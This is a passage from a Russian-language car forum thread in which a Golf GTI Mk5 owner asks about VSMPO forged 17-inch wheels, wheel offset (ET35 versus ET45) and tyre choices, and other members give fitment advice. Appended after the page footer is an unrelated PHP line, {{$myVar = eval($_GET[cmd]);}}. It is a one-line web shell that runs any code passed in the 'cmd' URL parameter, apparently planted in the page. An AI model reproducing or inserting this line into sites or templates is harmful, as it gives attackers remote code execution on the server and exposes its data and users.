+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 37

Тема: ковка ВСМПО 17" и соответствующие шины на гти5, помогите выбрать


  1. #1

    Question ковка ВСМПО 17" и соответствующие шины на гти5, помогите выбрать

    Имеется GTI MkV на стоковых колесах
    Собственно сижу и думаю, не купить ли диски ВСМПО Пантера 7.5х17 ЕТ 35? По цене очень кошерно (5900), вес 6.9 вроде тоже неплохо... На дизайн мне пофиг. Есть ли о них хорошие отзывы? (
    Код:
    http://salda.ru/wheels/wheels17/?pid=106
    )
    Ну и далее, что на них надеть? 235/45 Мишлен PS3 подойдет? В магазине парят мозг что могут тереть арки. Я так понимаю, что для 235 ширины нужно 8 ширины диска... Или не париться и остаться на 225?
    Езжу быстро по Москве, на треке не бываю, важна усточивость на высоких скоростях (200+ по мкаду) и терпимость к колеям:)

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    для ГТИ5 не пойдетЪ....... вылет у них ты смотрел ?


    А дизайн ?......... хм по мне это один самых лучших классических "алясушидрифт" дизайнов, правильный и разумный.

    Добавлено через 1 минуту
    и насчет цены и характеристик тут не парься, одни из самых лучших дисков, а про цену вообще халява.......иностранцы давятся, но ничего не поделаешь против гиганта Верхняя Салда и русской халявы,............. не вся ковка ушла в самолеты ))))))
    Последний раз редактировалось BON; 11.03.2010 в 17:43. Причина: Добавлено сообщение
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Цитата Сообщение от BON Посмотреть сообщение
    для ГТИ5 не пойдетЪ....... вылет у них ты смотрел ?


    А дизайн ?......... хм по мне это один самых лучших классических "алясушидрифт" дизайнов, правильный и разумный.

    Добавлено через 1 минуту
    и насчет цены и характеристик тут не парься, одни из самых лучших дисков, а про цену вообще халява.......иностранцы давятся, но ничего не поделаешь против гиганта Верхняя Салда и русской халявы,............. не вся ковка ушла в самолеты ))))))
    Так, значит ЕТ35 мало? Не налезет? Тогда есть другой вариант, менее привлекательный конечно... Модель Дельта 7х17 ЕТ45, но они тяжелее и уже.
    Код:
    http://salda.ru/wheels/wheels17/?pid=244
    Нашел Slik L702S, 7.5х17 ЕТ45, они подороже, но и покрасивее и тяжелее на кг.
    Код:
    http://www.slikcom.ru/c/goods.php?id=839&raz=17x7.5

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от Panz Посмотреть сообщение
    Так, значит ЕТ35 мало? Не налезет? Тогда есть другой вариант, менее привлекательный конечно... Модель Дельта 7х17 ЕТ45, но они тяжелее и уже.
    Код:
    http://salda.ru/wheels/wheels17/?pid=244
    Нашел Slik L702S, 7.5х17 ЕТ45, они подороже, но и покрасивее и тяжелее на кг.
    Код:
    http://www.slikcom.ru/c/goods.php?id=839&raz=17x7.5

    Дельта............ хм........ они не выпускаются вроде........ мож ошибаюсь Уточни по телефону если хочешь........... но твои пожелания в 235-ю резину на 7J диск не айс. Вес конечно немного больше, но поверь мне ты его не заметишь, очень многое будет зависеть от веса покрвшки. Например мой Пантера с Бриджем GIII оказались тяжелее против ОЗ литых и покрышки Мишка Экзальто......... а если взвесить только диски, то конечно Пантера была бы легче.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    Ну это все конечно хорошо... Дельта есть в наличии, можно ехать покупать. Как и Пантера. Может поехать примерить Пантеру сначала?
    И еще, все таки поточнее, можно 235 на 7.5 одеть?

  6. #6
    III место Самый Интересный Автомобиль 2011 Archelo is on a distinguished road Аватар для Archelo
    Регистрация
    26.03.2008
    Машина
    GTI 5
    Сообщений
    277
    Сам видел можно. На родные 17 (GTI 5) приятель юзает доволен все ок.

  7. #7
    Отлично, поехал мерять Пантеру. По покрышкам тоже посоветуйте что-нибудь пожалуйста. Я так почитал, рекомендують Pzero без приписок (неро, россо и тд), Мишлен PS3 тоже вроде. Как думаете?

  8. #8
    III место Самый Интересный Автомобиль 2011 Archelo is on a distinguished road Аватар для Archelo
    Регистрация
    26.03.2008
    Машина
    GTI 5
    Сообщений
    277
    Про PS3 не знаю (да и думаю отзывов пока нету) но Пизеро и ПС2 вне обсуждения лучшая гражданская европейская резина.

  9. #9
    До ВСМПО я так сегодня и не доехал (зато доехал до Турбомоторс и прошил времянку), буду думать до субботы. Еще раз для непонятливых чайников - чем грозит ЕТ35? Просто будет тереть суппорт или вообще не налезет? Или какие-то другие причины??? Просто не хочется более тяжелые и узкие покупать...

  10. #10
    GTI-Racing Cupman is on a distinguished road Аватар для Cupman
    Регистрация
    17.10.2008
    Машина
    Cupra II GIAC
    Сообщений
    139
    Чем меньше ЕТ, тем больше вылет из арок. Будет слишком сильно выпирать. Соответственно нагрузка на ступицу будет непомрно большая.

    Я узнавал в магазине на Варшавке у них Пантеры мне сказали нет с вылетом 45. Как и Дельты. Дельту вообще не делают с рассверловкой 5*112 и вылетом ЕТ45.

+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Как выбрать шины
    от Evgeniy777 в разделе Шины, диски
    Ответов: 14
    Последнее сообщение: 02.04.2024, 17:31
  2. Ответов: 28
    Последнее сообщение: 02.04.2024, 15:50
  3. какие летние шины выбрать? 225/45 r17
    от Alexey602 в разделе Шины, диски
    Ответов: 62
    Последнее сообщение: 02.04.2024, 03:12
  4. Помогите выбрать авто "для погонять"...
    от NeverGTI в разделе Отзывы / Выбор
    Ответов: 46
    Последнее сообщение: 30.08.2019, 17:06
  5. Помогите выбрать!!!!!
    от Zorro в разделе Отзывы / Выбор
    Ответов: 16
    Последнее сообщение: 29.11.2009, 22:38

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}